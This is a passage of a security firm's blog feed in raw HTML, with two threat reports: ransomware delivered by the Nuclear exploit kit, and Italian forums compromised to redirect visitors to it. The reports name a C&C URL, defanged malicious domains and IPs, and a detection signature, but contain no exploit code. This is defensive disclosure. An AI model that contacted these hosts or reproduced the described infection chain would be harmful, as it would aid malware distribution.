    style=&quot;padding-bottom: 79.94791666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACaElEQVR42o1Ta3OaQBTl//+Sdqb9mnbaJohRWF5GkYcsKEYlkYg8JQQR0wMmmcmXTpnDmbN37z33sjswRFJVVRmNRqoiXwA1GY91XVcUBXsQWI7aLPkDiixp4zvm9/dvP79++XP1Y3A7GAyGPY7r9d7Asj0W7/uy3XoHy/V5QWA8uk4ekmNe5FlWFMXrfzzn8xnsui4jqSvDSk0rurpiRXF02fv30zQN0iiljKwsJ+O9ru+jqE6Suq4b4Hhs+XQCnzs0XbNPnW3bZgzT32yKzSb3/fzhIQ+C5yw7lmVdVSdYfOBSDAaapiuezRhldD/V4uk0tO0YcJxkvc53u2e4PD21CIJityshYPGpM4qJ5KlqKElbQrbg0WgHI0DTQsPYG0YEjY8CMF0Yvtnto3oyMRhJXmpahNTpdK9pezBgWbFpRpeaTsezWTyfZ4tFNp+nczcOdkdDN9uxKc18/3m1OnR7medlQVBut2hSYvgkqfL8iIPoUKVpVb3U3YHNmPFkTWk+myWOky6XOSxQBnSneAAeHwvfLxABwysMSwyfH86WZTG66dt2htnQk9LWwvPy9Ro1bWf0iaKXoqjL8gSuKtzf2z23B3Y3WbvugdKU2qltJxgBRpYZI+K6iLRBRByaLhbtXPCN45f69Np+s3rnGWY01Xe6ETrIpvFUD8HzRXK/yjrk7jxZeCl1YseNwcFTkReNZeGq+GG/xwnD4fC2L4sifhfCC7IokSEvE5HwvCQQRPjBQBSIKAhYSiKRJVEhPMP3rkmflW57AndNuBuxz7aiz3b6ptOtINw1NJIF7kYecOTmlzTs/wXzfk2iblNQ6QAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NuclearExploitKit2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/8375b949da85e15651390c01bd00192b/5a190/NuclearExploitKit2.png&quot;
        srcset=&quot;/website/static/8375b949da85e15651390c01bd00192b/804b2/NuclearExploitKit2.png 384w,
/website/static/8375b949da85e15651390c01bd00192b/e5715/NuclearExploitKit2.png 768w,
/website/static/8375b949da85e15651390c01bd00192b/5a190/NuclearExploitKit2.png 800w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Deobfuscation is pretty simple and leads to a PE file (Windows executable) that has a &lt;a href=&quot;https://www.virustotal.com/gui/file/177bf80ab5e7476281ce3f6c42b3c780d09494dde088942a3aee4d69260232c4/detection&quot;&gt;pretty low detection rate on VirusTotal (2/56)&lt;/a&gt;, with only AhnLab-v3 and SUPERAntiSpyware detecting it as malicious.&lt;/p&gt;
&lt;p&gt;But what does this malware do? Execution on Certego&apos;s sandbox shows it will encrypt all of the files on the affected PC, renaming them in the form:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;&amp;#x3C;original_name&gt;.id-&lt;id-number&gt;_&lt;email&gt;&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;with &amp;#x3C;original_name&gt; being the original file name, &lt;id-number&gt; being a unique ID the malware gives to each victim, and &lt;email&gt; being the address to contact to get the decryption instructions.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d89d80d4b019159f939fb1320b77698c/5a190/NuclearExploitKit3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 28.125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABJklEQVR42qWNUUvCUBiGz8/Lq+G/sJ+Qd2b3WaIYlF3WVXOam4GbxiQ9rkyn2/Q0aDtRodNZR5Qx3NaJ6hf08fDy8MLLBy4uWa4sXLHXJU7gKjW2xFNhS9U/+J+GK9e+qfxSrtywnACUtjR4aPW6t8YQ6mrHNlXT6FmmapvDZ9RH+v1kpIyH3dHjnT7oaP22oUIKdVoCXdOwbRm6ZtuWro3yuex5sXiUOcweZ4pnpwJfbTREpQvnzuz97fXzY7l0F4u5M3emNAHGL4SsnpA5nTkIoZ1YbC+ZZBgmHo8nErup1H46fZDP5QuFk3pdbDabrrtcr9dBEERRBKj5vk9WK8/zCCGyLE8mqCXLEELqkiSJoqgoChWMMX252Wy22y0dh2EIon/cF0JMJChNg7ATAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NuclearExploitKit3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d89d80d4b019159f939fb1320b77698c/5a190/NuclearExploitKit3.png&quot;
        srcset=&quot;/website/static/d89d80d4b019159f939fb1320b77698c/804b2/NuclearExploitKit3.png 384w,
/website/static/d89d80d4b019159f939fb1320b77698c/e5715/NuclearExploitKit3.png 768w,
/website/static/d89d80d4b019159f939fb1320b77698c/5a190/NuclearExploitKit3.png 800w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The most peculiar characteristic of this ransowmare is the fact that it does not give you clear instructions for the payment: it simply renames all your files, and you&apos;ll have to be smart enough to understand that all you have to do is to contact the email address you see appended in your file names. The fact that almost no antivirus solution is still able to correctly detect this ransomware shows that it&apos;s probably a brand new piece of malware. We still haven&apos;t analyzed it, so we still cannot say anything, but right after being executed, the malware makes a single POST request to the following site:&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://permanencez/&quot;&gt;http://permanencez .com/script.php&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The content of the POST request and the subsequent server response are shown below.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d8e5378ec090bbe5af385b941e0e8837/5a190/NuclearExploitKit4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 78.64583333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADeklEQVR42n2S22obVxSG9Qbpe5hAyDP0OtFT5LY3pb0JBIqhJpi4cZqCodA21LTkJuAmOLalkUYHS+ORK1saHUbWITrZOs5IM6PTSEt/14wk8FU3fKy91v75WXvt7fn6oPTg2fvawx3/3dYPa5z9TtjceiWZbnx+vK7fq+2E+6zrc505rm59/6n08Nn70gPPa6H6NJUvo1gszNVCgW6KJSqVy1SuVKhWr1O1WiNVLVChcEPVWt2tVfisyLob1qtqnvK57Jw1+FOuPvX8nah5m6USark8fcnm8EVRUFdVtNptdDUNnV4PzbsWGrd3aHe7bt7prmiv6fT61O1pOIxXvJ6DaMV7m1MxzGRIUzLQ2NCq1zFlM4eZPsCUTebWCO5aLnF/LVc5mZMp3gYyK8OGkoWeTlHrQkY3ncaIO3Fki8XChZj5fI4FEYi5v2htaIzZ0MeGb6M33upVCnoySb3kFax8HiYzqtVA3CGNJ26nNBphycyHBiaajqmuc/fMUGe3AQ35Bvu+lNez9znl7Taa6JdL1FTziPhOoUgSmvkcwqcnyKauYXTaiEUjEAMC1IzCBgababCHQwz1ESajOXX6BvbZy7P/OenNZhqoFu8oq5RxehbHx3/8+Hn/F3z73XM2iaDf6iESiUMIhKGkcrB6bNThLk0LljnFbAY2HGLvU4Kv7Et65WQTSmZI1ykNan6MdLqHbLaEcqkBy5rBGhFse4n5AhiPCQPDxtCc81yd+a1mqBsmdo/iqw7T2RYbDEhR+kilumyowTAWmEwJhjlzX5Jo4bJcbh5lua67OWk8292jxMrwKt1AQdVISXc49tFoDKBrJl9n5nb2f2vzbVYdsuE7fuU/Dv/Cjy93aXfvNRx+evMGu6/2kLy+xpTvqRsWBuYIzkvejy58Zo2ndNvprmb4G39GKRZFWAyQKJwhFBQQDYuQpRguZQmXFxISF3EXWTrHv1yT4+fuWeLC0cRZE6erSxm/BviVD0N5rxwNIS76KRY4RVQ4hRwJIhb0uVyEAozgnHPuR4K1G42DFDiDFBIonZDwLsQf+/dg7kkwIHKHwWkkFLLDomiHg0E7IgZXeyYSEm0xGLAFQbBDnDuEWSvFzu3o2YkdjYSnsizjwK888XzzofLV9nH28fZH5ZHDS4cTdRU3+w1rzYYXH5KPtrm+zfHF0fVjx+s/ytEuFbul2cMAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;NuclearExploitKit4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d8e5378ec090bbe5af385b941e0e8837/5a190/NuclearExploitKit4.png&quot;
        srcset=&quot;/website/static/d8e5378ec090bbe5af385b941e0e8837/804b2/NuclearExploitKit4.png 384w,
/website/static/d8e5378ec090bbe5af385b941e0e8837/e5715/NuclearExploitKit4.png 768w,
/website/static/d8e5378ec090bbe5af385b941e0e8837/5a190/NuclearExploitKit4.png 800w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Basically, the malware sends its C&amp;#x26;C server a unique ID, the hostname of the infected machine, the whole string appended to the file names (using the format shown above) and a number that appears to be randomly generated. The server answers with a binary string that may contain the encryption key - but we still have to verify this point. They also seem to be using one or more Squid instances as reverse proxies to hide the real C&amp;#x26;C&apos;s address.&lt;/p&gt;
&lt;p&gt;The exploit kit can be detected by using the following two Emerging Threats Snort/Suricata signatures:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;etcurrent_events nuclear ek exploit uri struct aug 12&quot;&gt;&lt;pre class=&quot;language-etcurrent_events nuclear ek exploit uri struct aug 12&quot;&gt;&lt;code class=&quot;language-etcurrent_events nuclear ek exploit uri struct aug 12&quot;&gt;ET CURRENT_EVENTS DRIVEBY Nuclear EK SWF M2&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;However, the download of the XOR-ed payload and the malware&apos;s request to the above mentioned C&amp;#x26;C Server do not seem to trigger any alert on Snort at the moment.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Several Italian forums compromised with Exploit Kit]]></title><description><![CDATA[In the last few days, Certego threat monitoring systems detected a malware distribution campaign affecting several forums hosted on italian domains.]]></description><link>https://www.certego.net/blog/exploit-kit/</link><guid isPermaLink="false">exploit-kit</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Thu, 05 Feb 2015 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;How it works&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The affected forum sites have been previously compromised, possibly exploiting vulnerabilities in software platforms used for forums management, namely vBulletin version 4.1.9 and IP Board version 3.4.6. Users who visit the forum pages are redirected to external sites to download the so called Nuclear Pack Exploit Kit, a software container that provides the ability to leverage several vulnerabilities on user machines in order to infect them and gain complete control. In this particular case, files in .swf format are used to exploit the &lt;a href=&quot;https://helpx.adobe.com/security/products/flash-player/apsb15-04.html&quot;&gt;latest Adobe Flash Player vulnerabilities&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;All the forums identified by Certego as being compromised during this campaign have URLs in the following format:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;http://[domain]/forums/threads/[id]-[slug]&lt;/strong&gt;&lt;/em&gt;
with domains like:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;[random_long_string].[domain]&lt;/strong&gt;&lt;/em&gt;
For example, these are some of the domains used to distribute Nuclear Pack, albeit not all of them are still reachable and active:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;72ni9v3j9chko9ak5u4uwhf.nostaljiyemekler [.] com
ey03cunzlam19kc1v9ee9jf.gumuspastabodrum [.] com
ftafyk9wkvu42523ju20iri.devletdestegi [.] com&lt;/strong&gt;&lt;/em&gt;
We also identified some of the IP addresses on which the malicious domains are are hosted, in example:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;195.154.166[.]120
213.238.168[.]139
213.238.166[.]227&lt;/strong&gt;&lt;/em&gt;
Some of the IPs as well are no longer reachable and may have been cleaned, but most of them are still active and dangerous.&lt;/p&gt;
&lt;p&gt;A few of these IP addresses belong to Virtual Private Servers purchased specifically for the installation of Nuclear Pack Exploit Kit, while others, used only as the first step in the redirection chain, are more likely to be compromised hosts. Gaining the control of these servers in the first place has allowed the creation of sub-domains with random names used for the distribution of malware. As a matter of fact, this way the Exploit Kit is reachable only by knowing beforehand the subdomain used, and is therefore much more protected from accidental discovery.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Countermeasures&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This attack exploits vulnerabilities in Flash Player, which therefore must be updated to the latest version If you suspect to be already compromised, you can try to remove the infection using the following free products:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://it.malwarebytes.com/premium/&quot;&gt;MalwareBytes Anti-Malware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.microsoft.com/it-it/download/malicious-software-removal-tool-details.aspx&quot;&gt;Microsoft Malicious Software Removal Tool&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.bleepingcomputer.com/download/adwcleaner/&quot;&gt;AdwCleaner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A more radical solution is to uninstall the Flash plug-in browser, or to limit the operation selectively, as explained in &lt;a href=&quot;https://www.howtogeek.com/188059/how-to-enable-click-to-play-plugins-in-every-web-browser/&quot;&gt;this guide&lt;/a&gt;, but this must be carefully evaluated because of the impacts it may have on usability and user experience in a production environment.&lt;/p&gt;</content:encoded></item></channel></rss>